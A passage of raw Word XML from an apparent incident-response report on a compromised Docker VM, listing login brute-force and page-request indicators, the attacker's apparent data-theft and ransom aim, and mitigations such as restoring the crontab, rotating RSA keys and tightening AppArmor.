      <w:r w:rsidR="6B1953DE" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDFF227" w14:textId="7A45D254" w:rsidR="6B1953DE" w:rsidRDefault="6B1953DE" w:rsidP="1DD92F8E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Didn’t succeed in replacing the html.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650579C4" w14:textId="31F019A8" w:rsidR="1B3C0A91" w:rsidRDefault="1B3C0A91" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Frame 25320 – 19:27 WET:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2E910" w14:textId="693439C6" w:rsidR="1B3C0A91" w:rsidRDefault="1B3C0A91" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sends command “docker restart app” </w:t>
      </w:r>
      <w:r w:rsidR="67A9719B" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to restart the Docker process of the VM</w:t>
      </w:r>
      <w:r w:rsidR="7A5902A5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and at this point, the machine was stopped.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64624A1C" w14:textId="3E8D03A9" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1488F33D" w14:textId="1D7D8BA7" w:rsidR="49981629" w:rsidRDefault="49981629" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Indicators of Compromise (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>IoCs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C97C63" w14:textId="3ABF090E" w:rsidR="0CAD515B" w:rsidRDefault="0CAD515B" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>High authentication failures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E38F4AA" w14:textId="340986E1" w:rsidR="456FD24A" w:rsidRDefault="456FD24A" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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A high range of authentication attempts were made in a short amount of time </w:t>
      </w:r>
      <w:r w:rsidR="62E2F7F2" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(certainly, there was automation for this process)</w:t>
      </w:r>
      <w:r w:rsidR="10CC7ACC" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BED4A32" w14:textId="3D56FA47" w:rsidR="10CC7ACC" w:rsidRDefault="10CC7ACC" w:rsidP="1DD92F8E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All the attempts were made for either “user” or “admin”</w:t>
      </w:r>
      <w:r w:rsidR="7DE7F34B" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31603B0E" w14:textId="026C9AF2" w:rsidR="7DE7F34B" w:rsidRDefault="7DE7F34B" w:rsidP="1DD92F8E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With the previous points in mind, there’s a possibility that credentials were stolen from other hosts</w:t>
      </w:r>
      <w:r w:rsidR="49F36542" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, so it is important to check them</w:t>
      </w:r>
      <w:r w:rsidR="670B8A97" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D661647" w14:textId="012B90B1" w:rsidR="6B3431B5" w:rsidRDefault="6B3431B5" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lots of requests on important files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260395A8" w14:textId="60EB089A" w:rsidR="173C7A64" w:rsidRDefault="173C7A64" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:numPr>
          <w:ilvl w:val="0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On frames 6630 to 7158 lots of requests were made to the main page, this might mean that</w:t>
      </w:r>
      <w:r w:rsidR="6A45F256" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the attackers found some possible</w:t>
      </w:r>
      <w:r w:rsidR="435A3150" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability regarding that.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E6DDDE" w14:textId="6BD2443E" w:rsidR="1AE2D6AF" w:rsidRDefault="1AE2D6AF" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista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An investigation </w:t>
      </w:r>
      <w:r w:rsidR="02FBF375" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r w:rsidR="5AFDA6DA" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> this subject </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>would be</w:t>
      </w:r>
      <w:r w:rsidR="6753114C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> prudent.</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39058C8C" w14:textId="2E669EEE" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49D2A0DD" w14:textId="59F71D6B" w:rsidR="416B85C4" w:rsidRDefault="416B85C4" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Mitre</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack matrix analysis in “Mitre-matrix.</w:t>
      </w:r>
      <w:r w:rsidR="0E929975" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>xlsx</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00D206A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidR="00571EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>figure</w:t>
      </w:r>
      <w:r w:rsidR="00D206A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0FAE5C" w14:textId="71911E63" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B0399A9" w14:textId="717CFDE8" w:rsidR="631EB97C" w:rsidRDefault="631EB97C" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77FCA0" w14:textId="44B273F2" w:rsidR="7E0EF81C" w:rsidRPr="00E4142A" w:rsidRDefault="7E0EF81C" w:rsidP="1DD92F8E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The intention</w:t>
      </w:r>
      <w:r w:rsidR="74F22C1B" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the attacker w</w:t>
      </w:r>
      <w:r w:rsidR="7E2B9100" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ere</w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> very clear, </w:t>
      </w:r>
      <w:r w:rsidR="126551C4" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">them </w:t>
      </w:r>
      <w:r w:rsidR="71B7C45C" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>being</w:t>
      </w:r>
      <w:r w:rsidR="126551C4" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="7AD4905D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>steal data</w:t>
      </w:r>
      <w:r w:rsidR="455211A5" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="28C54BC1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> gain access to the system</w:t>
      </w:r>
      <w:r w:rsidR="07D4F29D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="28C54BC1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="5BB75366" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>so that they could</w:t>
      </w:r>
      <w:r w:rsidR="37854D80" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> charge for a release.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D16D9AB" w14:textId="5118ED28" w:rsidR="00E4142A" w:rsidRDefault="00E4142A" w:rsidP="1DD92F8E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Apparmor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> use prevented further compromise of the system beyond the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vm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F482FE8" w14:textId="4D28ACB4" w:rsidR="5DD763BD" w:rsidRDefault="5DD763BD" w:rsidP="1DD92F8E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To mitigate the impact,</w:t>
      </w:r>
      <w:r w:rsidR="75682523" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> you may</w:t>
      </w:r>
      <w:r w:rsidR="34913C77" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE2B119" w14:textId="2B084279" w:rsidR="34913C77" w:rsidRDefault="34913C77" w:rsidP="1DD92F8E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E</w:t>
      </w:r>
      <w:r w:rsidR="5DD763BD" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dit the crontab file </w:t>
      </w:r>
      <w:r w:rsidR="3CDC5377" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">back </w:t>
      </w:r>
      <w:r w:rsidR="5DD763BD" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to the original </w:t>
      </w:r>
      <w:r w:rsidR="7B4A8965" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidR="2AF03E54" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698E0345" w14:textId="32CD603A" w:rsidR="2AF03E54" w:rsidRDefault="2AF03E54" w:rsidP="1DD92F8E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F</w:t>
      </w:r>
      <w:r w:rsidR="4ED8337A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ix the CWEs mentioned in this report</w:t>
      </w:r>
      <w:r w:rsidR="20F1BC48" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="4ED8337A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF6C8CD" w14:textId="1EBC1FFB" w:rsidR="4D911281" w:rsidRDefault="4D911281" w:rsidP="1DD92F8E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>E</w:t>
      </w:r>
      <w:r w:rsidR="4ED8337A" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rase the image uploaded by the attackers</w:t>
      </w:r>
      <w:r w:rsidR="0806CDD1" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6274F65C" w14:textId="5C8D6DBE" w:rsidR="0806CDD1" w:rsidRDefault="0806CDD1" w:rsidP="1DD92F8E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1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a new pair of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> keys and </w:t>
      </w:r>
      <w:r w:rsidR="55B4C2E6" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>widely spread</w:t>
      </w:r>
      <w:r w:rsidR="2B747076" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the new public key </w:t>
      </w:r>
      <w:r w:rsidR="3E72192D" w:rsidRPr="1DD92F8E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to all interested parties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B80171" w14:textId="069606A8" w:rsidR="00E4142A" w:rsidRDefault="00E4142A" w:rsidP="1DD92F8E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 better configuration of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>apparmor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidR="00D206A5">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>yo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>u confine the app and protect the keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E058A5E" w14:textId="2EE3FFEE" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7456E68B" w14:textId="0E6FAC10" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11437F14" w14:textId="3C72D238" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24DBD2DE" w14:textId="77777777" w:rsidR="00D206A5" w:rsidRDefault="00D206A5" w:rsidP="00D206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76B46277" wp14:editId="697775FA">
            <wp:extent cx="5943600" cy="3495675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1" name="Imagem 1" descr="Uma imagem com texto, pre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preto, eletrónic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286B" w14:textId="1CE52AF3" w:rsidR="1DD92F8E" w:rsidRDefault="00D206A5" w:rsidP="00D206A5">
      <w:pPr>
        <w:pStyle w:val="Legenda"/>
        <w:rPr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 w:rsidR="00571EF6">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="00571EF6">
        <w:t xml:space="preserve">. matrix </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B17431" w14:textId="49957262" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F7FABFB" w14:textId="74053C5E" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C69174E" w14:textId="4DDC64DE" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E466DFE" w14:textId="7D151BCF" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C9A9C3" w14:textId="0C4332FE" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E"/>
    <w:p w14:paraId="4C84E144" w14:textId="099D7B09" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E"/>
    <w:p w14:paraId="01A654C6" w14:textId="713C039D" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E"/>
    <w:p w14:paraId="08F12BBC" w14:textId="19B964E5" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E"/>
    <w:p w14:paraId="0AD0689A" w14:textId="6243589C" w:rsidR="1DD92F8E" w:rsidRDefault="1DD92F8E" w:rsidP="1DD92F8E"/>
